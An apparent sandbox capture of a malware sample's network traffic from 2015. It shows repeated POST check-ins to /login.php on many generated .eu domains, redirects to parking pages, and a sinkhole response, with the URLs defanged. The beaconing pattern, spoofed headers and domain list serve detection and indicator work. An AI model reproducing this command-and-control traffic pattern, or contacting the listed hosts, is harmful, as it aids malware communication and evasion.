cache, pre-check=0, post-check=0..content-security-policy: default-src
 'self'; script-src 'self' 'unsafe-inline'..x-content-security-policy:
 default-src 'self'; script-src 'self' 'unsafe-inline'..X-WebKit-CSP: 
default-src 'self'; script-src 'self' 'unsafe-inline'..Content-Type: t
ext/html;charset=UTF-8..Transfer-Encoding: chunked..Date: Fri, 20 Nov 
2015 09:08:59 GMT..Server: ZeroPark-Traffic..3ed..<!DOCTYPE htm<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nozulufynax.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:52 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww62.nozulufynax.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:52 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.nozulufynax.e
u..Vary: Accept-Encoding......

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: nozulufynax.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:55 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww62.nozulufynax.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:55 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.nozulufyna
x.eu..Vary: Accept-Encoding..

GET /90623dde15463e9fb45001ad5063db65 HTTP/1.1

Host: xsso.nopegymozow.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=c5be0b98ef08bd0e96394b12a6af6382|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=90623dde15463e9fb45001ad5063db65; domain=.nopegymozow.eu
19..Landed nopegymozow.eu<br>..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: digivehusyd.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 200 OK

Connection: close

Set-Cookie: jsessionid=e90c55b2c9a14c217bf26ca73db4527f; Expires=Fri, 18 Nov 2022 09:08:59 GMT

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Length: 0

Content-Type: text/plain; charset=utf-8

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qetuluvolos.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:39 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww62.qetuluvolos.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:39 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.qetuluvolos.e
u..Vary: Accept-Encoding......

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qetuluvolos.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:43 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.qetuluvolos.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:43 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.qetuluvolo
s.eu..Vary: Accept-Encoding..

GET /domain/rynazuqihoj.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=f2c2596452aa9379694886959d3b2888; domain=.rynazuqihoj.eu

Location: hXXp://xsso.rynazuqihoj.eu/f2c2596452aa9379694886959d3b2888

3e..Go hXXp://xsso.rynazuqihoj.eu/f2c2596452aa9379694886959d3b2888..0.
.

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galokusemus.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:30 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww62.galokusemus.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:30 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.galokusemus.e
u..Vary: Accept-Encoding..

GET /4abc123f5bc1fe014bbeb686d9306960 HTTP/1.1

Host: xsso.marytymenok.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=50f0100787987c2c428a9f0fa37a4606|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=4abc123f5bc1fe014bbeb686d9306960; domain=.marytymenok.eu
19..Landed marytymenok.eu<br>..0..

GET /domain/vofozymufok.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=519227042aaa4d45b3d8d04c6d6182c2; domain=.vofozymufok.eu

Location: hXXp://xsso.vofozymufok.eu/519227042aaa4d45b3d8d04c6d6182c2

3e..Go hXXp://xsso.vofozymufok.eu/519227042aaa4d45b3d8d04c6d6182c2..0.
.

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: rynyhipexon.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:22:11 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.rynyhipexon.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:22:11 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.rynyhipexo
n.eu..Vary: Accept-Encoding..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: dimutobihom.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:30 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.dimutobihom.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:30 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.dimutobiho
m.eu..Vary: Accept-Encoding..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: norumikemem.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:34 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww62.norumikemem.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.norumikemem.e
u..Vary: Accept-Encoding..

GET /f2c2596452aa9379694886959d3b2888 HTTP/1.1

Host: xsso.rynazuqihoj.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=db559cd2ebfad778907f69945582240c|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=f2c2596452aa9379694886959d3b2888; domain=.rynazuqihoj.eu
19..Landed rynazuqihoj.eu<br>..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qebahilojam.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:34 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww62.qebahilojam.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.qebahiloja
m.eu..Vary: Accept-Encoding..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: jewuqyjywyv.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/jewuqyjywyv.eu

Set-Cookie: btst=2eb3e8e51e54041546311d246b6dd730|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218
0..

GET /71c55851e5901a95263b027885fa0411 HTTP/1.1

Host: xsso.jewuqyjywyv.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=2eb3e8e51e54041546311d246b6dd730|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:01 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=71c55851e5901a95263b027885fa0411; domain=.jewuqyjywyv.eu
19..Landed jewuqyjywyv.eu<br>..0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.qekikyvutic.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:19 GMT

Server: Apache

Set-Cookie: vsid=909vr1955561591417248; expires=Wed, 18-Nov-2020 09:09:19 GMT; path=/; domain=ww92.qekikyvutic.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_ikED3u47J16sfIBRasIHmX4ZsQVGoKi HPfV1RPTbc I2lTVX nUNgDONyylJP dZ/iuNF1ubDmxIRIzn81MNA==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=74

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
  <!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIh
vcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIccl
v6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_ikED3u47J16sfIBRasIHmX4Z
sQVGoKi HPfV1RPTbc I2lTVX nUNgDONyylJP dZ/iuNF1ubDmxIRIzn81MNA==" >
..<head>..    <meta http-equiv="Content-Type" content="text/h
tml; charset=UTF-8">..    <title>ww92.qekikyvutic.eu</titl
e>..    <style type="text/css">*{margin:0; padding:0; border:
 0; overflow:hidden} html, body {height: 100%;}</style>..</he
ad>..<body width="100%" height="100%">..<noscript><m
eta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.p
hp?_dnm=ww92.qekikyvutic.eu&_cfrg=1&_drid=as-drid-2396656235494782" /&
gt;<center><p style="padding:1em; font-size:1.5em;">For se
arch results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=
ww92.qekikyvutic.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="tex
t-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p
></center></noscript>..<div id="rmgblock" width="100
%" height="100%"></div>..<script type="text/javascript" sr
c="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.qekikyvut
ic.eu"></script>..<script type="text/javascript" language=
"JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark
/show_afd_ads.js"></script>..<script type="text/javascript
"> function collectHeight(){try{var e=Math.max(document.documen<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qexofyqihid.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:34 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww92.qexofyqihid.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww92.qexofyqihid.e
u..Vary: Accept-Encoding..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.puregivytoh.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:27 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<htm
l xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title&g
t;puregivytoh.eu</title>...<meta http-equiv="Content-Type
" content="text/html; charset=utf-8"/>...<script type='text/java
script' language='JavaScript'>.var domain = 'puregivytoh.eu';.var u
niqueTrackingID = 'MTQ0ODAxMDU0My40MTgxOjZlM2E5MWJiY2MzZjAxNTY1ZmNmM2Z
jNGIyNGFjMmMyYjRlZTFhMTJlZDFlNTI4ZGUxODRhOWVlMTNiYTViYTE6NTY0ZWUzMmY2N
jE2Mw==';.var clickTracking = false;.var themedata = '';.var xkw = '';
.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var
 clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off
';.var scriptPath = '';...</script>...<script src='hXXp://par
kingcrew.net/assets/scripts/js3.js' type='text/javascript' language='J
avaScript'></script>...<script type='text/javascript' lang
uage='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4
NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTMyZjY1MGFmfHx8MTQ0ODAxMDU0My
40MjJ8NWVhN2YzMjZmNjRmYWVhOTY0M2U3MGZkMzZlNzg5OTA3MmU4NTliN3x8fHx8MXx8
fDB8NTY0ZWUzMmY4YWJmODJjZjM3OGI2MGFmfHx8MHx8fHx8fDB8fHx8fHx8fHw=';<
/script>..</head>..<body>...<script type='text/javas
cript' language='JavaScript'>.window.onload = function() {..if(clic
kTracking && typeof track_onclick == 'function') track_onclick("899acb
ee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: cihunemyror.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 200 OK

X-Sinkhole: Malware sinkhole

Content-Type: text/html

Server: nginx/0.7.65

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Length: 0

HTTP/1.1 200 OK..X-Sinkhole: Malware sinkhole..Content-Type: text/html
..Server: nginx/0.7.65..Date: Fri, 20 Nov 2015 09:09:00 GMT..Content-L
ength: 0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.tufecagemyl.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:05 GMT

Server: Apache

Set-Cookie: vsid=910vr1955561452511509; expires=Wed, 18-Nov-2020 09:09:05 GMT; path=/; domain=ww92.tufecagemyl.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_OAueoF3VxCXminZtCrSbUeaf/HsDdgnWFFNicfj0QmcpipVXgcsNGkjQHOYkS1zFBlgqBQ6yeTW/FUkZ/HPU5g==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=106

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
  <!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIh
vcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIccl
v6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_OAueoF3VxCXminZtCrSbUeaf
/HsDdgnWFFNicfj0QmcpipVXgcsNGkjQHOYkS1zFBlgqBQ6yeTW/FUkZ/HPU5g==" >
..<head>..    <meta http-equiv="Content-Type" content="text/h
tml; charset=UTF-8">..    <title>ww92.tufecagemyl.eu</titl
e>..    <style type="text/css">*{margin:0; padding:0; border:
 0; overflow:hidden} html, body {height: 100%;}</style>..</he
ad>..<body width="100%" height="100%">..<noscript><m
eta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.p
hp?_dnm=ww92.tufecagemyl.eu&_cfrg=1&_drid=as-drid-2396656235494782" /&
gt;<center><p style="padding:1em; font-size:1.5em;">For se
arch results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=
ww92.tufecagemyl.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="tex
t-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p
></center></noscript>..<div id="rmgblock" width="100
%" height="100%"></div>..<script type="text/javascript" sr
c="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.tufecagem
yl.eu"></script>..<script type="text/javascript" language=
"JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark
/show_afd_ads.js"></script>..<script type="text/javascript
"> function collectHeight(){try{var e=Math.max(document.documen<<< skipped >>>

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.lykemujebeq.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:28 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<htm
l xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title&g
t;lykemujebeq.eu</title>...<meta http-equiv="Content-Type
" content="text/html; charset=utf-8"/>...<script type='text/java
script' language='JavaScript'>.var domain = 'lykemujebeq.eu';.var u
niqueTrackingID = 'MTQ0ODAxMDU0NC40MTkxOjE1YmU1MTI1NmIwMmNjOGVjOTIyNDF
iNDdhNTAzYTczYjRjNzZkOWE1NDkxMWFlMGY3MGE3ODg3ZTM2YjEwOWU6NTY0ZWUzMzA2N
jU3MA==';.var clickTracking = false;.var themedata = '';.var xkw = '';
.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var
 clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off
';.var scriptPath = '';...</script>...<script src='hXXp://par
kingcrew.net/assets/scripts/js3.js' type='text/javascript' language='J
avaScript'></script>...<script type='text/javascript' lang
uage='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4
NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTMzMDYzM2QyfHx8MTQ0ODAxMDU0NC
40MjM0fGQ5OWFlODRlM2MzYzY0MmVlY2M3YzlkNjhkMWQ1MDhlMDkwZWZiZGF8fHx8fDF8
fHwwfDU2NGVlMzMwODhmYmNlMTBiMDhiNDliZnx8fDB8fHx8fHwwfHx8fHx8fHx8';<
/script>..</head>..<body>...<script type='text/javas
cript' language='JavaScript'>.window.onload = function() {..if(clic
kTracking && typeof track_onclick == 'function') track_onclick("899acb
ee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/<<< skipped >>>

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.qebahilojam.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:28 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<htm
l xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title&g
t;qebahilojam.eu</title>...<meta http-equiv="Content-Type
" content="text/html; charset=utf-8"/>...<script type='text/java
script' language='JavaScript'>.var domain = 'qebahilojam.eu';.var u
niqueTrackingID = 'MTQ0ODAxMDU0NC40ODQyOjI4NjJkMzUzYzZlNDExYzJkYTc3M2U
yOTZiOTdlNzk0MzQ2N2EwNmU0NWMwOWVkNGNjYWVkNzBiODQzYzJhN2I6NTY0ZWUzMzA3N
jNjMA==';.var clickTracking = false;.var themedata = '';.var xkw = '';
.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var
 clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off
';.var scriptPath = '';...</script>...<script src='hXXp://par
kingcrew.net/assets/scripts/js3.js' type='text/javascript' language='J
avaScript'></script>...<script type='text/javascript' lang
